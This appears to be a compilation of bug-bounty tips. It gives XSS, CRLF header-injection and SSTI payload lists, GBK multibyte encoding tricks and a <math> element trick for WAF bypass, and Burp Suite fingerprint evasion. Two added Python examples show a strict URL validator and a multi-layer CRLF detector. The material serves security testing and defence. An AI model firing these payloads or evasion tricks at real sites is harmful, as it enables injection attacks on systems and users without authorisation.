Burp Suite 2023.8+ includes a feature that theoretically makes opening untrusted project files safe. If you find a bypass, you're probably eligible for a bounty - check the full details here:
https://portswigger.net/burp/releases/professional-community-2023-8
Bug Bounty Tip
GBK Encoding / MultiByte Attack
嘊 = %E5%98%8A = \u560a → %0A
嘍 = %E5%98%8D = \u560d → %0D
嘾 = %E5%98%BE = \u563e → %3E (>)
嘼 = %E5%98%BC = \u563c → %3C (<)
嘢 = %E5%98%A2 = \u5622 → %22 (")
嘧 = %E5%98%A7 = \u5627 → %27 (')
The left column is each character's UTF-8 percent-encoding; the right column is the low byte of its code point, which is what a sink that truncates characters to a single byte ends up with.
For XSS, CRLF, WAF bypass
Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network -> TLS -> Use custom protocols and ciphers"
https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation
Bug Bounty Tip
SSTI (Server Side Template Injection) Payload List
🔹 {7*7}
🔹 *{7*7}
🔹 {{7*7}}
🔹 [[7*7]]
🔹 ${7*7}
🔹 @(7*7)
🔹 <?=7*7?>
🔹 <%= 7*7 %>
🔹 ${= 7*7}
🔹 {{= 7*7}}
🔹 ${{7*7}}
🔹 #{7*7}
🔹 [=7*7]
If the response renders 49, the template engine evaluated the expression and the target is vulnerable.
Bug Bounty Tip
When the app only accepts URLs with a specific scheme, try injecting javascript://test.com, then use one of these line terminators to craft an XSS payload (in a javascript: URL the //test.com part is a line comment, so a line terminator after it ends the comment and whatever follows executes):
🔹 %0a
🔹 %0d
🔹 %E2%80%A8
🔹 %E2%80%A9
→ javascript://test.com%0aalert(1)
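The reason the tip above works is that the application's check looks at the wrong thing: a substring or prefix test for //test.com still passes when the scheme is javascript. The following is an added example (not code from the original page) contrasting such a weak check with a validator that normalises the string the way a browser does and then requires both an allowlisted scheme and an allowlisted host. The names weak_check, is_safe_url, browser_normalize and the allowlists are assumptions made for the example; the probe and benign inputs are constructed.

```python
from urllib.parse import urlsplit

# Hypothetical allowlists for the example: the tip names test.com as the expected host.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"test.com"}

# Browsers strip leading/trailing C0 controls and spaces, and drop ASCII tab, LF and CR
# anywhere in a URL before parsing it, so the validator must look at the same string
# the browser will act on.
_C0_AND_SPACE = "".join(chr(i) for i in range(0x21))


def browser_normalize(url):
    """Approximate the WHATWG URL parser's pre-processing of the input string."""
    url = url.strip(_C0_AND_SPACE)
    return url.replace("\t", "").replace("\n", "").replace("\r", "")


def weak_check(url):
    """The kind of check the tip defeats: 'does the URL point at //test.com?'.
    It accepts javascript://test.com%0aalert(1) because //test.com is still present."""
    return "//test.com" in url


def is_safe_url(url):
    """Parse, then require both an allowlisted scheme and an allowlisted host."""
    parts = urlsplit(browser_normalize(url))
    return parts.scheme.lower() in ALLOWED_SCHEMES and parts.hostname in ALLOWED_HOSTS


# Constructed inputs: the four line terminators from the tip, both percent-encoded (as
# they would be submitted) and decoded (as a browser executes the javascript: body).
PROBES = [
    "javascript://test.com%0aalert(1)",
    "javascript://test.com%0dalert(1)",
    "javascript://test.com%E2%80%A8alert(1)",
    "javascript://test.com%E2%80%A9alert(1)",
    "javascript://test.com\nalert(1)",
    "javascript://test.com\u2028alert(1)",
    " JaVaScRiPt://test.com\u2029alert(1)",   # leading space and mixed-case scheme
    "java\tscript://test.com%0aalert(1)",     # tab inside the scheme name
]
BENIGN = ["https://test.com/", "http://test.com/path?x=1", "HTTPS://test.com/"]


def evaluate(urls):
    """Return {url: (weak_check result, is_safe_url result)} for a list of URLs."""
    return {u: (weak_check(u), is_safe_url(u)) for u in urls}


if __name__ == "__main__":
    for u, (weak, strict) in evaluate(PROBES + BENIGN).items():
        print(f"weak={weak!s:5} strict={strict!s:5} {u!r}")
```

Every probe passes weak_check and fails is_safe_url, while the benign URLs pass both; the scheme allowlist is what decides, so the line-terminator variants never need to be enumerated on the defending side.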
CRLF Payload List
🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
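The list above mixes three encoding layers: plain and repeated percent-encoding, the non-standard %uXXXX escape, and the multibyte characters from the GBK table earlier on the page, whose code points end in 0x0D/0x0A. A detector that only decodes once misses most of them. The following is an added example, not code from the original page, of a Python detector that produces every view a downstream component might see (each percent-decoding pass, plus a low-byte view of non-ASCII characters, which is how this example models the table's U+560A → 0x0A mapping) and flags the ones that contain a header-injection pattern. The function names and the sample paths are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths: the first six follow the payload shapes in the
# list above, the last two are benign (one contains the same non-ASCII character
# with no header text behind it, to show the low-byte view alone does not flag it).
SAMPLE_PATHS = [
    "/%0d%0aSet-Cookie:crlf",                 # plain CRLF
    "/%250aSet-Cookie:crlf",                  # double-encoded LF
    "/%25250aSet-Cookie:crlf",                # triple-encoded LF
    "/%u000aSet-Cookie:crlf",                 # IIS-style %u escape
    "/%E5%98%8D%E5%98%8ASet-Cookie:crlf",     # U+560D U+560A, low bytes 0x0D 0x0A
    "/%23%0d%0aSet-Cookie:crlf",              # '#' prefix before CRLF
    "/search?q=cookies%20and%20cream",
    "/docs/%E5%98%8D",
]

MAX_DECODE_PASSES = 3  # bound the work; each pass strips one layer of %-encoding

# A CR or LF followed by something shaped like "Header-Name:" is the injection signature
HEADER_INJECTION = re.compile(r"[\r\n][ \t]*[A-Za-z0-9\-]+[ \t]*:")


def decode_u_escapes(s):
    """Expand the non-standard %uXXXX escape to its code point (urllib leaves it alone)."""
    return re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)


def low_byte_view(s):
    """Replace every non-ASCII character by the low byte of its code point.
    This models a sink that truncates characters to one byte, which is how
    U+560A becomes 0x0A (LF) and U+560D becomes 0x0D (CR) in the table."""
    return "".join(chr(ord(c) & 0xFF) if ord(c) > 0x7F else c for c in s)


def decoded_views(raw):
    """Yield every decoding of `raw` a downstream component might see:
    each successive %-decoding pass, and the low-byte view of each pass."""
    seen = set()
    cur = raw
    for _ in range(MAX_DECODE_PASSES):
        nxt = decode_u_escapes(unquote(cur, errors="replace"))
        for view in (nxt, low_byte_view(nxt)):
            if view not in seen:
                seen.add(view)
                yield view
        if nxt == cur:  # nothing left to decode
            break
        cur = nxt


def find_header_injection(raw_path):
    """Return the decoded view containing a header-injection pattern, or None."""
    for view in decoded_views(raw_path):
        if HEADER_INJECTION.search(view):
            return view
    return None


def scan(paths):
    """Return the subset of `paths` that decode to a CRLF header injection."""
    return [p for p in paths if find_header_injection(p) is not None]


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        hit = find_header_injection(p)
        print(("FLAG " if hit else "ok   ") + p + (f"  -> {hit!r}" if hit else ""))
```

The low-byte view is deliberately only consulted together with the header-name pattern: on its own it would flag any path containing CJK text whose code point happens to end in 0x0A or 0x0D, which is exactly the false-positive class a WAF rule based on this table has to avoid.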
Bug Bounty Reminder
Don't forget about the <math> element for XSS WAF bypass in Firefox.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> element makes any HTML element inside it clickable, so an href on an arbitrary (non-anchor) tag is followed.
Mindmap/Nmap/nmap UHD.png at main · Ignitetechnologies/Mindmap · GitHub
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
Mindmap/Red Team Dorks at main · Ignitetechnologies/Mindmap · GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks